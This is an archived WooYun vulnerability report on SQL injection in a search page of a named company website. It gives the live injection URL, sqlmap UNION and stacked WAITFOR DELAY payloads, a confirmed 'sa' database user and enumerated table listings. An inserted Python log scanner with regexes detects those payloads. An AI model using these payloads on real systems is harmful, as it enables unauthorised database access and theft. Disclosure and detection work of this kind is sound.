
Vulnerability Summary

Defect ID: wooyun-2014-083074

Title: SQL injection on a Hisense site (SA privileges)

Vendor: hisense.com

Author: Focusstart

Submitted: 2014-11-13 11:42

Fix time: 2014-11-13 12:56

Published: 2014-11-13 12:56

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: The vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2014-11-13: Details sent to the vendor; awaiting the vendor's handling
2014-11-13: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection on a Hisense site (SA privileges)

Detailed description:

Injection point: http://www.nj-hisense.com/company/zm/5/serch.asp?keywd=a&ft=news&userid=njhisense
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: keywd
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: keywd=a' UNION ALL SELECT 10, CHAR(58)+CHAR(97)+CHAR(114)+CHAR(119)+CHAR(58)+CHAR(71)+CHAR(102)+CHAR(121)+CHAR(76)+CHAR(75)+CHAR(81)+CHAR(70)+CHAR(79)+CHAR(71)+CHAR(110)+CHAR(58)+CHAR(120)+CHAR(108)+CHAR(102)+CHAR(58), 10-- &ft=news&userid=njhisense
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: keywd=a'; WAITFOR DELAY '0:0:5';--&ft=news&userid=njhisense
---
current user: 'sa'
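As an added example (not part of the original report), the following Python scanner runs over constructed IIS W3C-style log lines and flags the two payload shapes sqlmap reported above: the `' UNION ALL SELECT` column probe built with `CHAR()` concatenation, and the `'; WAITFOR DELAY` stacked query. The log field layout, timestamps, IP addresses and user agents are assumed and constructed for the sample.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log excerpt (not from the original report): the two
# sqlmap payloads quoted above as they appear URL-encoded in cs-uri-query, plus
# one benign search. Assumed field layout:
# date time s-ip method cs-uri-stem cs-uri-query port user c-ip user-agent status
SAMPLE_LOG = """\
2014-11-13 03:40:01 10.0.0.5 GET /company/zm/5/serch.asp keywd=hisense&ft=news&userid=njhisense 80 - 198.51.100.7 Mozilla/5.0 200
2014-11-13 03:40:09 10.0.0.5 GET /company/zm/5/serch.asp keywd=a%27+UNION+ALL+SELECT+10%2C+CHAR%2858%29%2BCHAR%2897%29%2BCHAR%2858%29%2C+10--+&ft=news&userid=njhisense 80 - 198.51.100.7 sqlmap/1.0 200
2014-11-13 03:40:15 10.0.0.5 GET /company/zm/5/serch.asp keywd=a%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3B--&ft=news&userid=njhisense 80 - 198.51.100.7 sqlmap/1.0 200
"""

# Signatures for what sqlmap reported: a UNION-based column probe (with the
# CHAR()+CHAR() string building used to avoid quote characters) and a T-SQL
# stacked query carrying a timing delay. Matching runs on the decoded query.
SIGNATURES = {
    "union_select": re.compile(r"'\s*UNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "stacked_waitfor": re.compile(r";\s*WAITFOR\s+DELAY\b", re.I),
    "char_concat": re.compile(r"CHAR\(\d+\)(?:\s*\+\s*CHAR\(\d+\))+", re.I),
}


def parse_line(line):
    """Return (client_ip, uri_stem, decoded_query) for one W3C log line, or None."""
    fields = line.split()
    if len(fields) < 11 or fields[0].startswith("#"):
        return None  # directive/header line or truncated record
    return fields[8], fields[4], unquote_plus(fields[5])


def scan_log(text):
    """Return one hit per request whose decoded query matches any signature."""
    hits = []
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        client_ip, stem, query = parsed
        matched = [name for name, rx in SIGNATURES.items() if rx.search(query)]
        if matched:
            hits.append({"client_ip": client_ip, "stem": stem,
                         "signatures": matched, "query": query})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["client_ip"], hit["stem"], ",".join(hit["signatures"]))
```

The benign first request produces no hit; only the two sqlmap requests are reported, each tagged with the technique(s) it matches.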

Proof of vulnerability:

Database: aa
[20 tables]
+--------------------------------------------------+
| dbo.R_Member |
| dbo.R_MemberFriendClass |
| dbo.R_MemberMsg |
| dbo.R_MemberPower |
| dbo.R_Pic |
| dbo.R_Products |
| dbo.R_ProductsClass_e |
| dbo.R_ad_list |
| dbo.R_ad_type |
| dbo.R_appraise |
| dbo.R_company_e |
| dbo.R_favorite |
| dbo.R_zh |
| dbo.lanmu |
| dbo.lyxj |
| dbo.member_1 |
| dbo.sygg |
| dbo.utype |
| dbo.vip_icp |
| dbo.zixun_leaveword_lt |
+--------------------------------------------------+
Database: tempdb
[2 tables]
+--------------------------------------------------+
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: wyt
[20 tables]
+--------------------------------------------------+
| dbo.R_MemberMsg |
| dbo.R_MemberPower |
| dbo.R_N_class |
| dbo.R_News_Template |
| dbo.R_Pic |
| dbo.R_Products |
| dbo.R_ProductsBigClass |
| dbo.R_ProductsClass_e |
| dbo.R_ProductsMiddleClass |
| dbo.R_ProductsSmallClass |
| dbo.R_ad_list |
| dbo.R_ad_type |
| dbo.R_appraise |
| dbo.R_company_e |
| dbo.R_cype_1 |
| dbo.R_favorite |
| dbo.R_honor |
| dbo.R_info_ad |
| dbo.R_info_e |
| dbo.R_info_title |
+--------------------------------------------------+
Database: wc_bdsyw_admin
[20 tables]
+--------------------------------------------------+
| dbo.R_Member |
| dbo.R_MemberFriendClass |
| dbo.R_MemberMsg |
| dbo.R_MemberPower |
| dbo.R_ProductsClass_e |
| dbo.R_ad_list |
| dbo.R_ad_type |
| dbo.R_appraise |
| dbo.R_company_e |
| dbo.R_favorite |
| dbo.R_info_ad |
| dbo.R_info_e |
| dbo.R_keyword |
| dbo.R_wanyetong |
| dbo.R_zh |
| dbo.getpwd |
| dbo.setban |
| dbo.setbg |
| dbo.utype |
| dbo.zixun_leaveword |
+--------------------------------------------------+
Database: s1
[20 tables]
+--------------------------------------------------+
| dbo.Notepad |
| dbo.R_ad_list |
| dbo.R_ad_type |
| dbo.R_appraise |
| dbo.R_company_e |
| dbo.R_honor |
| dbo.R_info_title |
| dbo.R_news |
| dbo.jindianzi_email |
| dbo.lyb |
| dbo.mb |
| dbo.news_cpl |
| dbo.news_pl |
| dbo.pcid |
| dbo.pk_pl |
| dbo.pkinfo |
| dbo.qqlist |
| dbo.vip_title |
| dbo.yjhd |
| dbo.zixun_leaveword_lt |
+--------------------------------------------------+
Database: msdb
[20 tables]
+--------------------------------------------------+
| dbo.RTblDTSProps |
| dbo.RTblDatabaseVersion |
| dbo.RTblIfaceMem |
| dbo.RTblParameterDef |
| dbo.RTblVersionAdminInfo |
| dbo.RTblWorkspaceItems |
| dbo.backupfile |
| dbo.restorefile |
| dbo.restorefilegroup |
| dbo.restorehistory |
| dbo.sysalerts |
| dbo.syscategories |
| dbo.sysjobschedules |
| dbo.sysnotifications |
| dbo.sysoperators |
| dbo.systargetservergroupmembers |
| dbo.systargetservergroups |
| dbo.systargetservers |
| dbo.systargetservers_view |
| dbo.systaskids |
+--------------------------------------------------+
Database: pubs
[14 tables]
+--------------------------------------------------+
| dbo.authors |
| dbo.discounts |
| dbo.employee |
| dbo.jobs |
| dbo.pub_info |
| dbo.publishers |
| dbo.roysched |
| dbo.sales |
| dbo.stores |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.titleauthor |
| dbo.titles |
| dbo.titleview |
+--------------------------------------------------+
Database: en
[20 tables]
+--------------------------------------------------+
| dbo.j_job_class |
| dbo.lanmu |
| dbo.mb |
| dbo.r_company |
| dbo.r_config |
| dbo.r_honor |
| dbo.r_info |
| dbo.r_job |
| dbo.r_keyword |
| dbo.r_member |
| dbo.r_news |
| dbo.r_news_ad |
| dbo.r_news_template |
| dbo.r_newsclass |
| dbo.r_utype |
| dbo.r_wanyetong |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.yqlj |
| dbo.zixun_leaveword |
+--------------------------------------------------+
Database: master
[20 tables]
+--------------------------------------------------+
| dbo.[INFORMATION_SCHEMA.CHECK_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.COLUMNS] |
| dbo.[INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE] |
| dbo.[INFORMATION_SCHEMA.COLUMN_PRIVILEGES] |
| dbo.[INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE] |
| dbo.[INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE] |
| dbo.[INFORMATION_SCHEMA.DOMAINS] |
| dbo.[INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.KEY_COLUMN_USAGE] |
| dbo.[INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.SCHEMATA] |
| dbo.[INFORMATION_SCHEMA.TABLES] |
| dbo.[INFORMATION_SCHEMA.TABLE_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.TABLE_PRIVILEGES] |
| dbo.spt_fallback_db |
| dbo.spt_fallback_dev |
| dbo.spt_fallback_usg |
| dbo.spt_monitor |
| dbo.spt_provider_types |
| dbo.spt_values |
+--------------------------------------------------+
Database: model
[2 tables]
+--------------------------------------------------+
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: Northwind
[20 tables]
+--------------------------------------------------+
| dbo.CustomerCustomerDemo |
| dbo.Invoices |
| dbo.Orders |
| dbo.Products |
| dbo.[Alphabetical list of products] |
| dbo.[Category Sales for 1997] |
| dbo.[Current Product List] |
| dbo.[Customer and Suppliers by City] |
| dbo.[Order Details Extended] |
| dbo.[Order Details] |
| dbo.[Order Subtotals] |
| dbo.[Orders Qry] |
| dbo.[Product Sales for 1997] |
| dbo.[Products Above Average Price] |
| dbo.[Products by Category] |
| dbo.[Quarterly Orders] |
| dbo.[Sales Totals by Amount] |
| dbo.[Sales by Category] |
| dbo.[Summary of Sales by Quarter] |
| dbo.[Summary of Sales by Year] |
+--------------------------------------------------+

Remediation:

Filter the input.

Copyright notice: reproduction must credit the source, Focusstart@WooYun


Vulnerability Response

Vendor response:

Severity: No impact; vendor ignored

Ignored at: 2014-11-13 12:56

Vendor reply:

This website is not a Hisense Group website.

Latest status:

None

